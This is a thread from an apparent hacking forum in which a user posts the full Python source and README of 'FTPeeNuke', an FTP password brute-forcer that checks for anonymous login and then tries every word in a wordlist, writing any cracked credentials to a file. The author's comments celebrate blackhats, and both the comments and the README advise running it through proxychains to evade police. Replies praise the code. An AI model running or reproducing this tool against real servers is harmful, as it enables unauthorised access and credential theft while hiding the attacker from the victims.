iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
FTPeeNuke
  • chroniccommand
    Posts: 1,389
    FTPeeNuke version 1.0

    FTPeeNuke is an FTP brute forcer written in Python by me(chroniccommand).

    It uses ftplib to try and connect to the server over and over until it gets a password match or it reaches the end of the wordlist.

    Tested on:
    [list]
    [*]T35 accounts[/*:m]
    [*]Local proFTP server[/*:m][/list:u]


    Source:


    #!/usr/bin/python

    '''
    FTPeeNuke v1.0
    Author: Chroniccommand
    http://poison.teamxpc.com ; http://iExploit.org/ ; http://team-xpc.com/ ; http://haxme.org/
    Blackhats ftw. Fuck whitehats.

    Please note that this is best used with proxychains to protect your identity.
    Would'nt wanna get fuxed up by the po po would ya?
    '''

    print('''
     _____ _____ _____         _____     _       
    |   __|_   _|  _  |___ ___|   | |_ _| |_ ___ 
    |   __| | | |   __| -_| -_| | | | | | '_| -_|
    |__|    |_| |__|  |___|___|_|___|___|_,_|___|
    Version 1.0
    Author: Chroniccommand
    http://poison.teamxpc.com/
    NOTE: You may wanna use proxychains with this
    ''')

    import sys, ftplib

    def usage():
        '''
        Print usage
        '''
        print(\"Usage: %s <target> <username> <wordlist>\nExample: ./ftpeenuke.py 192.168.1.1 root /wordlist.txt\" % sys.argv[0])
        sys.exit()

    if len(sys.argv) != 4:
        usage()

    global host
    host = str(sys.argv[1])
    global user
    user = str(sys.argv[2])
    global wlist
    wlist = str(sys.argv[3])

    def isanon(hst):
        '''
        Check for anonymous login
        '''
        print \"Checking...\"
        try:
            conn = ftplib.FTP(hst)
            conn.login()
            conn.retrlines('LIST')
            conn.quit()
            print \"Anon login successful\"
            raw_input(\"Press enter to continue...\")
            print(\"Attacking %s\" % host)
            pass
        except Exception:
            print \"Anon login unsuccessful\"
            raw_input(\"Press enter to continue...\")
            print(\"Attacking %s\" % host)
            pass
        
    def bruteme(word, usr):
        '''
        Attack
        '''
        try:
            conn = ftplib.FTP(host)
            conn.login(usr, word)
            conn.retrlines('LIST')
            conn.quit()
            print(\"Found password for user %s\" % usr)
            print(\"Password: \" + word)
            writefile = raw_input(\"Write to file?[Y/n]\")
            if writefile == \"Y\":
                file = open(\"ftpeenuke.txt\", 'a')
                file.write(\"-+-+-+-+-+-{FTPeeNuke dump}+-+-+-+-+-+\n\")
                file.write(\"Host: \" + sys.argv[1] + \"\n\")
                file.write(\"Username: \" + usr + \"\n\")
                file.write(\"Password: \" + word + \"\n\")
                file.write(\"-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\")
                file.close()
                print(\"Dumped results to file\")
                raw_input(\"Press enter to continue\")
                sys.exit()
            else:
                raw_input(\"Press enter to continue\")
                sys.exit()
        except Exception:
            print(\"Trying password %s\" % word)
            pass
        except KeyboardInterrupt:
            print(\"FTPeeNuke aborted by user\n\")
            sys.exit(1)

    try:
        wordfile = open(wlist, 'r')
        curwords = wordfile.readlines()
        current = 0
        while current < len(curwords):
            curwords[current] = curwords[current].strip()
            current = current + 1
    except IOError:
        print(\"Could not find your wordlist file. Exiting...\")
        sys.exit()
        
    check = raw_input(\"Check for anonymous login?[Y/n]\")
    if check == 'Y':
        isanon(host)
        for word in curwords:
            bruteme(word.replace(\"\n\",\"\"), user)
    else:
        print(\"Attacking %s\" % host)
        for word in curwords:
            bruteme(word.replace(\"\n\",\"\"), user)


    README:


    FTPeeNuke is an FTP bruteforcer written in Python by chroniccommand.

    Please note that you should use proxychains with this as the server will log your IP for every login attempt.

    http://poison.teamxpc.com/
    http://iexploit.org/
    http://team-xpc.com/
    http://haxme.org/

    Greets to x3n0n, Xinapse, Semtex-Primed and every other member I <3

  • Xin
    Posts: 3,251
    Nice source chronics, 'fuck whitehats' ? :p
    Xin
  • nu11byte
    Posts: 53
    Haha, it looks good. I might need to get back into Python, it's a great language.
  • Sh3llc0d3
    Posts: 1,910
    said:


    Haha, it looks good. I might need to get back into Python, it's a great language.



    I don't spose your a perl coder from hf are ya? Sounds familar lol
  • undead
    Posts: 822
    said:


    Blackhats ftw. Fuck whitehats.



    Why so much hate on whitehats? lol

    Nice work btw
Add a Comment